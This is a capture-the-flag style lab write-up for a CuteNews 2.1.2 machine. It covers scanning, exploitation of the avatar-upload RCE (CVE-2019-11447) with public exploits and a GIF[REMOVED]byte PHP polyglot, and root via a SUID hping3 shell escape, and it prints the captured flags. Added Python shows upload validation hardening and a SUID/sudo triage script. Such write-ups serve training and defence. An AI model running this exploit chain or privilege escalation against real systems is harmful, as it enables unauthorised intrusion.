
OSCP - Other Machines - CuteNews

Key takeaways

  • Privilege escalation via a SUID-root hping3

Steps

As usual, start with nmap. Several ports are open (SSH, two HTTP servers, POP3 and POP3S), but port 80 is the most promising foothold, so we try that first.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 16:42 CST
Nmap scan report for 172.16.33.9
Host is up (0.024s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open  pop3     Courier pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: STLS USER UIDL IMPLEMENTATION(Courier Mail Server) UTF8(USER) PIPELINING LOGIN-DELAY(10) TOP
995/tcp open  ssl/pop3 Courier pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: TOP USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL LOGIN-DELAY(10) PIPELINING
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.83 seconds

Run gobuster against port 80 (with the quickhits wordlist) to see which paths are worth a look:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.33.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/quickhits.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/example.php          (Status: 200) [Size: 9522]
/LICENSE.txt          (Status: 200) [Size: 3119]
/README.md            (Status: 200) [Size: 2523]
/uploads/             (Status: 200) [Size: 0]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

example.php and /uploads/ look interesting. The page also tries to fetch resources from the hostname cute.calipendula, so add the IP-to-hostname mapping to /etc/hosts first and then look again.

That reveals CuteNews is running on the host; next, look up what is known about it.

Judging from the CuteNews GitHub repository, the install should also expose index.php and other standard files.

Visiting index.php shows the version: CuteNews 2.1.2.

This version has a known remote code execution vulnerability in the avatar upload (CVE-2019-11447). Searching for public exploits turns up two:

CuteNews 2.1.2 - Remote Code Execution - PHP webapps Exploit

https://github.com/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE

I tried both. The first one (48800.py from Exploit-DB) was not very reliable here and failed to find its webshell, but it at least registered a user and gave us a working username and password:

└─$ python 48800.py



           _____     __      _  __                     ___   ___  ___
          / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
         / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
         \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
                                ___  _________
                               / _ \/ ___/ __/
                              / , _/ /__/ _/
                             /_/|_|\___/___/




[->] Usage python3 expoit.py

Enter the URL> http://172.16.33.9
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================
[+] Registration successful with username: hrsPEFXiMa and password: hrsPEFXiMa

=======================================================
Sending Payload
=======================================================
signature_key: cc144629390d2773049c78b2add35fb7-hrsPEFXiMa
signature_dsi: 544f2a694aca87233e0c163f7b330002
logged in user: hrsPEFXiMa
============================
Dropping to a SHELL
============================

command > rev.php
sorry i can't find your webshell try running the exploit again

Then the second exploit, reusing the account the first one registered, uploaded a PHP file as an avatar (with an image magic byte prepended so it passes the image check) and triggered it for a reverse shell:

┌──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.9]
└─$ python exploit.py  -l http://172.16.33.9 -u hrsPEFXiMa -p hrsPEFXiMa -e hrsPEFXiMa@hack.me
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX 
 
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://172.16.33.9/uploads/avatar_hrsPEFXiMa_hrsPEFXiMa.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
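Why the "Adding Magic Byte" step works, as an added illustration (my own code, not the exploit's or CuteNews'): an upload check that only sniffs the leading bytes of the file accepts a GIF header followed by PHP, and if the server then keeps the client's .php extension inside a web-executable /uploads/ directory, the "image" runs as code. The hardened variant below derives the stored extension from the detected content, refuses mismatches and script tags, and generates the stored filename itself. Function names, the magic-byte table and the "<?" check are assumptions for the example.

```python
import os
import re
import secrets

# Constructed payload: a GIF header glued to a PHP stub. Any content check that
# only looks at the first bytes sees a valid image.
GIF_MAGIC = b"GIF89a"


def build_polyglot(php_source: bytes) -> bytes:
    """Prepend the GIF magic so the file passes a leading-bytes image check."""
    return GIF_MAGIC + b"\n" + php_source


# Magic-byte table for formats an avatar upload would plausibly accept (assumption).
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
}


def sniff_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


# --- Naive check: the vulnerable pattern -------------------------------------
def naive_avatar_name(user: str, filename: str, data: bytes):
    """Accept anything that sniffs as an image and keep the client's filename
    (observed on the target: /uploads/avatar_<user>_<name>.php).
    Returns the stored name, or None if rejected."""
    if sniff_image_type(data) is None:
        return None
    return f"avatar_{user}_{os.path.basename(filename)}"


# --- Hardened check ------------------------------------------------------------
ALLOWED = {"gif", "png", "jpg"}


def hardened_avatar_name(user: str, filename: str, data: bytes):
    """Reject unless the declared extension and the sniffed content agree and are
    on the allow-list; never reuse the client filename; refuse a PHP open tag
    anywhere in the body (polyglots are still images to a sniffer)."""
    declared = os.path.splitext(filename)[1].lstrip(".").lower()
    if declared == "jpeg":
        declared = "jpg"
    sniffed = sniff_image_type(data)
    if declared not in ALLOWED or sniffed != declared:
        return None
    if b"<?" in data:  # assumption: treat any script tag in an "image" as hostile
        return None
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", user):
        return None
    # Server-chosen name: no client input reaches the filesystem path.
    return f"avatar_{user}_{secrets.token_hex(8)}.{sniffed}"
```

Even with the hardened check, the upload directory should not be executable by the web server (for mod_php on Apache, php_admin_flag engine off inside the Directory block for /uploads/), so a bypass of the validator still does not become code execution.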

Running sudo -l confirms that www-data can run hping3 as root without a password, but sudo pins the argument list to exactly --icmp, so this probably is not a usable privilege escalation path on its own:

www-data@cute:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp

Keep looking and enumerate SUID binaries. This is where root comes from, and it is hping3 again: the binary itself is SUID root, so the sudo restriction is irrelevant. Running it with no arguments drops into hping3's interactive shell, and /bin/bash -p from there gives a root shell (the -p flag stops bash from resetting the effective UID to the real one, which is why euid=0 shows up below while uid stays 33). Note that ./usr/sbin/hping3 only works because the current directory is /:

www-data@cute:/$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
www-data@cute:/$ ./usr/sbin/hping3
./usr/sbin/hping3
hping3> /bin/bash -p
/bin/bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# cat /root/root.txt
cat /root/root.txt
0b18032c2d06d9e738ede9bc24795ff2
bash-5.0# cat /home/fox/user.txt
cat /home/fox/user.txt
dcb8189a0eaf7a690a67785a7299be60
bash-5.0# 
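The two checks above (the sudo -l rule and the SUID listing) are exactly what a defender or a post-exploitation triage script should be diffing against a baseline. As an added example that is my own code and not part of the original writeup, the script below takes the find and sudo -l output from the box as constructed input, reports any SUID file outside a stock Debian 10 baseline, parses the sudo rules, and ranks them: an unexpected SUID shell-escape binary is rated high, while a sudo rule whose arguments are pinned (as --icmp is here) is downgraded because sudo only matches the exact argument list. The baseline set and the SHELL_ESCAPES list are assumptions (hand-picked, not exhaustive).

```python
import os
import re

# Constructed inputs: the SUID listing and sudo -l output captured on the box.
SUID_LISTING = """\
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
"""

SUDO_L = r"""Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp
"""

# Assumption: SUID files a clean Debian 10 install ships. Replace with the
# paths (and hashes) from your own golden image.
DEBIAN10_SUID_BASELINE = {
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/umount", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/mount",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
}

# Programs that hand out a shell or arbitrary command execution when privileged
# (hand-picked GTFOBins-style subset; assumption, not exhaustive).
SHELL_ESCAPES = {"hping3", "bash", "sh", "vim", "vi", "find", "less", "more",
                 "awk", "perl", "python", "python3", "nmap", "env"}


def unexpected_suid(listing: str, baseline=DEBIAN10_SUID_BASELINE) -> list:
    """Paths in the find output that are not in the baseline."""
    return sorted(set(listing.split()) - baseline)


# One sudoers entry as printed by sudo -l: "(runas) TAG: /path/cmd args".
SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_rules(text: str) -> list:
    """Extract runas / NOPASSWD / command / pinned-args from sudo -l output."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True          # everything after this header is a rule
            continue
        m = SUDO_RULE.match(line) if in_cmds else None
        if m:
            rules.append({
                "runas": m.group("runas").split(":")[0].strip(),  # "(root : root)" -> root
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "cmd": m.group("cmd"),
                "args": m.group("args").strip(),
            })
    return rules


def triage(listing: str, sudo_text: str) -> list:
    """Return (severity, message) findings, worst first within each source."""
    findings = []
    for path in unexpected_suid(listing):
        sev = "high" if os.path.basename(path) in SHELL_ESCAPES else "medium"
        findings.append((sev, f"unexpected SUID binary: {path}"))
    for r in parse_sudo_rules(sudo_text):
        if r["runas"] not in ("root", "ALL"):
            continue
        if os.path.basename(r["cmd"]) not in SHELL_ESCAPES:
            continue
        if r["args"]:
            sev, note = "medium", f"arguments pinned to '{r['args']}'"
        else:
            sev, note = "high", "any arguments allowed"
        pw = "NOPASSWD" if r["nopasswd"] else "password required"
        findings.append((sev, f"sudo: {r['cmd']} as root, {pw}, {note}"))
    return findings


if __name__ == "__main__":
    for sev, msg in triage(SUID_LISTING, SUDO_L):
        print(f"[{sev}] {msg}")
```

On a live host, feed it the real output of find / -type f -perm -4000 2>/dev/null and sudo -l; the remediation for this box is simply chmod u-s /usr/sbin/hping3 (hping3 needs raw sockets, which is what cap_net_raw is for, not setuid root).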


http://www.kler.cn/a/532348.html
